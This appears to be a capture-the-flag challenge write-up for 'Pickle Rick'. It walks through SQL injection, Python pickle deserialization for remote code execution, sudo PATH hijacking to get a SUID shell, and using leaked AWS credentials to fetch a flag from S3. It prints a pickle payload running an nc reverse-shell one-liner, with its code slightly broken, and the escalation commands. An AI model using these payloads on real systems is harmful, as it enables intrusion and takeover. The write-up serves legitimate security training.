Pickle Rick






Rick has turned himself into a pickle, can you find him before its too late...

File is temporarily hosted at https://drive.google.com/file/d/1ZULGK4p7cJQHNabmDHdtki-g1xNfHu0f

MD5: ba83987433851f2101f846e89b9b99f6 SHA256: 1dd4388022be3946a72dd3fcf2603896396a8574d5dbe214f9ecf1b0a8b2db92 Password: &y9PBYf8gZ^996s9

I will suggest giving participants link to download the file before the CTF start, and only release the password after the CTF started.


  1. sql injection bypassing blacklist

  1. Python insecure desirialization with the pickle modules for RCE

sample payload

import pickle
import os

class RCE:
def __reduce__(self):
 cmd = 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f'
 return os.system, (cmd,)

if __name__ == '__main__':
pickled = pickle.dumps(RCE())

with open("pickled_data.pickle", "wb") as f:
  1. Binary with the SUID bit in opt director /opt/clean_pickle.sh

Running sudo -l shows the user is able to run sudo on /opt/clean_pickle.sh with SETENV AND NOPASSWD

Exploit script

echo "cp /bin/sh /tmp/qaz; chmod +s /tmp/qaz" > /tmp/rm
sudo PATH=/tmp:$PATH /opt/clean_pickle.sh

/tmp/qaz -p
  1. Pivoting to AWS Cloud

In /root/.aws/credentials there is a clear text IAM Creds for AWS cloud. Enumerate the perms and list the s3 files.


aws_access_key_id = redacted
aws_secret_access_key = redacted
  1. Get flag :D

aws configure
AWS Access Key ID [****************E5EW]: redacted
AWS Secret Access Key [****************O+wn]: redacted
Default region name [None]: 
Default output format [None]: 

aws s3 ls
2023-02-13 16:12:01 lnc-pickle-shop

aws s3 ls lnc-pickle-shop
2023-02-13 16:12:56         26 flag.txt

aws s3 cp  s3://lnc-pickle-shop/flag.txt flag.txt
download: s3://lnc-pickle-shop/flag.txt to ./flag.txt            

cat flag.txt



Last updated